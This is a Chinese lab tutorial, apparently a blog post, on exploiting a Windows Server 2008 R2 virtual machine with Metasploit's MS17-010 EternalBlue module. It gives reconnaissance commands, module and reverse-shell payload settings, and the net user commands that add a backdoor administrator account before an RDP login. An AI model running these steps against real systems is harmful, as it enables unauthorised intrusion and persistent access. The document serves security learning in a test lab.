渗透测试:metasploit+ms-17-010+Windows2008r2

渗透测试:metasploit+ms-17-010+Windows2008r2

工具

1 vbox

2 kali

3 win2008r2

最终效果

渗透测试:metasploit+ms-17-010+Windows2008r2_第1张图片

创建一个属于Administrators组的用户admin,并使用admin账户进入系统。

实现步骤

1 使用netdiscover 探测局域网内的主机,目的是发现需要渗透的主机

渗透测试:metasploit+ms-17-010+Windows2008r2_第2张图片

现在我们发现了3台主机。

2 使用nmap进行扫描

nmap基本功能有三个

(1)是扫描主机端口,嗅探所提供的网络服务

(2)是探测一组主机是否在线

(3)还可以推断主机所用的操作系统,到达主机经过的路由,系统已开放端口的软件版本

nmap 扫描连续的IP地址的方法是使用“-”将主机位的第一位和最后一位接起来。
渗透测试:metasploit+ms-17-010+Windows2008r2_第3张图片

这里我们可以看到192.168.1.4这台主机开放了3389端口,3389端口是一个远程桌面的服务端口,如果连接上了,输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程的电脑,因此远程服务器一般都将这个端口修改数值或者关闭。

这个功能在后续的环节有用。

3 测试环境

攻击机:kali

ip:192.168.1.5

靶机:win2008r2

ip:192.168.1.4

4 使用metasploit的ms-17-010 payload

1 metasploit 主界面

渗透测试:metasploit+ms-17-010+Windows2008r2_第4张图片

2 搜索ms17_010

渗透测试:metasploit+ms-17-010+Windows2008r2_第5张图片

search ms17_010

选择第3 个

# 3  
name : exploit/windows/smb/ms17_010_eternalblue
disclosure date : 2017-03-14   
rank : average  
check : No 
description : MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

3 调用模块 exploit/windows/smb/ms17_010_eternalblue及配置payload

use exploit/windows/smb/ms17_010_eternalblue

查看模块需要设置的

show options

渗透测试:metasploit+ms-17-010+Windows2008r2_第6张图片

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.5
rhosts => 192.168.1.5
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

设置目标IP地址及选择payload,查看payload要求
渗透测试:metasploit+ms-17-010+Windows2008r2_第7张图片
payload 要求设置监听主机,这里写本地kali的ip地址

set lhost 192.168.1.4

最后再查看一下设置

show options

渗透测试:metasploit+ms-17-010+Windows2008r2_第8张图片

4 开始攻击

exploit

渗透测试:metasploit+ms-17-010+Windows2008r2_第9张图片

发现是因为把本地kali ip与 远程win2008的ip弄混了
重新设置一下

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.5
lhost => 192.168.1.5
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.4
rhost => 192.168.1.4

再次进行攻击

渗透测试:metasploit+ms-17-010+Windows2008r2_第10张图片

####5 进shell提权

shell

[外链图片转存失败(img-DFSwnDlQ-1567346052575)(https://i.imgur.com/03jQJUi.png)]

添加用户并将用户加入管理组

然后使用windos cmd命令进行创建用户并加入管理员组

net user qwer asdf123! /add

注意密码要符合复杂性要求

net local group Administrators qwer /add  

把admin用户加入本地管理员组

渗透测试:metasploit+ms-17-010+Windows2008r2_第11张图片

6 远程桌面连接登录

这里之前的3389端口可以用到了

渗透测试:metasploit+ms-17-010+Windows2008r2_第12张图片

使用创建的qwer用户进行登录
渗透测试:metasploit+ms-17-010+Windows2008r2_第13张图片

登录成功

渗透测试:metasploit+ms-17-010+Windows2008r2_第14张图片

你可能感兴趣的:(kali)